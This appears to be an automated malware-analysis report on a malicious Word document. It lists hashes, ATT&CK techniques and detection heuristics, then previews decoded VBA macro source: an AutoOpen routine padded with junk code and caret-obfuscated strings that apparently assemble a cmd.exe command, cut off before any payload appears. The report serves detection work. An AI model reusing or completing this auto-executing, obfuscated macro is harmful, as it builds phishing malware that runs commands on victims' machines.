Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 94077646495213e6…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 129.6 KB
Created: 2018-10-02 10:52:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: b91941b4759dad3aa15cc867d5cde1dd
SHA-1: 9951742300b73e00e45d7ac0febad71ab38af23e
SHA-256: 94077646495213e6f53b6be41082d0130c10b23192dcd9896b00b01c37d2a610
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a legacy WordBasic AutoOpen macro. This macro is designed to execute obfuscated VBA code, which includes a Shell() call, indicating an attempt to run external commands or download additional payloads. The presence of the AutoOpen marker and the Shell() call strongly suggests a downloader or dropper functionality.

Heuristics (7)

  • ClamAV: Doc.Malware.00536d-6704725-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6704725-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 92673 bytes
SHA-256: 95057c5036e9a7f19d6bbbfed0a3309a797fea052591c259c3797c9df008c79d

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "HTcojPoTOPX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   If KXsQqW Or zCfiw Then

Dim WmYBwV(3)
WmYBwV(0) = MmNMwi + 81550
WmYBwV(1) = 29721 + BYhczw + 71176 + 71291
WmYBwV(2) = 66500 + QGYju

End If
   If UwnoCQ >= WijVK Then

Dim JmJHHt(4)
JmJHHt(0) = 34352 + wPnnzp
JmJHHt(1) = jUnTFN + whHpHX
JmJHHt(2) = 37509 + AUsnm + tlHXw + WizADa
JmJHHt(3) = mOwCF + UpbzR + tRiPTu + Dlqif

End If
   If PSOiG = jzhBER Then

Dim PRXSmp(1)
PRXSmp(0) = ChnTfG + XmwfQH

End If
   If Cbtsf = 7 Then

Dim ukjLC(4)
ukjLC(0) = 13525 + lOYwqJ
ukjLC(1) = iiuCA + INkWoJ
ukjLC(2) = 81451 + 10622 + 28771 + YtKfIw
ukjLC(3) = 14211 + dzvmY + jazrb + jqslw

End If
   If lMdlmr Eqv 3 Then

Dim bNIlSC(2)
bNIlSC(0) = sWFnR + qabRvV + AiQpJP + miDQEi
bNIlSC(1) = JNsoQ + 98790 + cHcoOu + LlLqQz

End If
   If zSbCSi And ToimR Then

Dim MidiWM(4)
MidiWM(0) = WnBvU + asranj
MidiWM(1) = MQaMOj + OonFcd + wDiLu + JaJRji
MidiWM(2) = 41604 + VcOvF
MidiWM(3) = 77963 + wIQQp

End If
WVkbiRrjbQE (KeyString(BtSqncrm + jRMjC + 13 + 2 + 52 + HzUnZ + StFioGTt) + oVPKlEkL + EQskDGi + KeyString(aCbriX + JzRqmN + 15 + 2 + 60 + jBrWskbA + CAVihbj) + TWmifROXE + njqfYwziXL + YBwjC + tMLisfoCm + QuoUGnR + fTwXtZEw + rWFBpLMVtP + HJEIlMK + KmvwiATzX + AwSrqcp + tvUmGI)
   If mzTzW = CtczS Then

Dim ZziWZj(2)
ZziWZj(0) = vCXbiK + 26024
ZziWZj(1) = ktIBB + wtOqh

End If
   If LqsMZK Eqv omCuS Then

Dim EWzrJV(2)
EWzrJV(0) = 26800 + 82988 + fjTABJ + hpzjk
EWzrJV(1) = 58043 + 47556

End If
   If blvCD = uqTpZ Then

Dim uznSo(3)
uznSo(0) = 61077 + LtZIN
uznSo(1) = ENviK + ziWijS + 77570 + FmchMj
uznSo(2) = nrLRww + FcBdh

End If
   If MzIIOc < YPEAAD Then

Dim ZQswd(3)
ZQswd(0) = 38765 + VjQOc + dtjFkF + tnTYzG
ZQswd(1) = 27495 + cGRvu
ZQswd(2) = fLJjD + hqPrt + 74419 + IijwPu

End If
End Sub


Attribute VB_Name = "izmrbFTK"
Function TWmifROXE()
If iVBJdU Xor otOSTd Then

Dim TzjPBB(2)
TzjPBB(0) = 5828 + ZanAb
TzjPBB(1) = 78054 + dWNoQ

End If
   If jHJiR <= 11 Then

Dim sSMVd(2)
sSMVd(0) = UizOXp + afiilk + 34557 + 90075
sSMVd(1) = HFnmk + dbDOzW + mDjEv + 76263

End If
   If iflSj <> BZYuzO Then

Dim LGhqCt(3)
LGhqCt(0) = 9735 + KIsWJ
LGhqCt(1) = 88016 + whpicw + 47980 + CUBkbC
LGhqCt(2) = UwIqaz + NsuNz + Xtvaw + aqEUlc

End If
vwslC = "d /V^:^ON/C" + """" + "^s^" + "e^t ^S^O^Q=^mc^E^ I" + "^m/^ ^DZl^ N^W^~^ " + "^}^[a^ ^u^g^-^"
If ljcriz < HdziXH Then

Dim VbkdVv(1)
VbkdVv(0) = 51808 + ctqYP

End If
   If iMZbG Or jYJUJt Then

Dim JDzRI(4)
JDzRI(0) = AmDnBw + PGjBJ + nDzkFw + mpDbI
JDzRI(1) = 23696 + HMZwZ + WrSbZ + iqiZo
JDzRI(2) = 16171 + YFPKS + UGGKic + ptHDhn
JDzRI(3) = 52975 + OvlXKh

End If
PwiwWcimR = " c^{^=^ W^O^E^" + " ^b4^\ ^J^w^;" + "^ ^y^H(^ ^>Z^D^" + " ^J^>)^ ^b]^m^ }{^L^" + " Y^'\^ ^=R^H^ ^_^j^" + "h^}/^i^Z^}^["
If KmOFvA < 12 Then

Dim RRlVG(3)
RRlVG(0) = 83675 + 53021
RRlVG(1) = 12509 + XPjNN + BRYnmq + 48149
RRlVG(2) = UNtwjt + HXPzN + GTTzk + JURId

End If
   If QPSwn > sBGEEJ Then

Dim hjzvh(4)
hjzvh(0) = ifrAjR + JimHK
hjzvh(1) = 6838 + DuTJfB + PBajWj + OBYPzj
hjzvh(2) = 54564 + YPljc
hjzvh(3) = NPwtBN + nQqPf + SiRQKi + udOsK

End If
   If fVDXz And 18 Then

Dim JBmbq(2)
JBmbq(0) = 41300 + mbkiA + sJtHw + wQskAG
JBmbq(1) = dujRMS + GiRsp + oMZTsj + 85587

End If
fzBJOqCiI = "^?^x^{^F^,%^h^B^" + "[vc^A^S^_^" + "t^W^-^,^a^*^@^\c%^"
If whIOSs Or 18 Then

Dim RINsr(2)
RINsr(0) = GQsUP + ruwEq
RINsr(1) = XPXDF + hRHHa + 28608 + fVbpL

End If
Wtsoj = ">^i^}^s^dx^;Xrn^k^" + "4^l^d^a8^T^_^" + "e^-^i^Mr^W^_r^b^#" + "^G^y^;^3^J^DG^S" + "^P^p^w^H^qT^" + "W(^#^1^$)^U/^ ^"
If PXRccQ <> 1 Then

Dim RNofqd(2)
RNofqd(0) = 68766 + Zuzpp + 82198 + SYNrM
RNofqd(1) = Tshid + 84303

End If
   If Yzohus <> zclSUE Then

Dim pWRDk(2)
pWRDk(0) = FtPkEp + UHwMlw
pWRDk(1) 
... (truncated)